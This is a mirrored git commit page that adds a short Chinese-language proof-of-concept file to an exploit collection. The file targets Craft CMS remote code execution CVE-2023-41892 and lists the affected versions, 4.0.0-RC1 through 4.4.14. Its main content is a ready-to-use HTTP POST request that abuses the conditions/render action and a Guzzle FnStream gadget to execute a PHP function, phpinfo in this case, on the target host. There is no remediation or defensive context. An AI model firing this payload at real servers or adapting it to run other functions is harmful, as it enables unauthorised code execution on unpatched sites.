mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create Craft CMS远程代码执行漏洞CVE-2023-41892.md
This commit is contained in:
parent
a01d5baf12
commit
9714d96a1d
14
Craft CMS远程代码执行漏洞CVE-2023-41892.md
Normal file
14
Craft CMS远程代码执行漏洞CVE-2023-41892.md
Normal file
@ -0,0 +1,14 @@
|
|||||||
|
## Craft CMS远程代码执行漏洞CVE-2023-41892
|
||||||
|
|
||||||
|
## 影响版本
|
||||||
|
Craft CMS >= 4.0.0-RC1
|
||||||
|
Craft CMS <= 4.4.14
|
||||||
|
|
||||||
|
## exp
|
||||||
|
```
|
||||||
|
POST /index.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
|
||||||
|
```
|
||||||
Loading…
x
Reference in New Issue
Block a user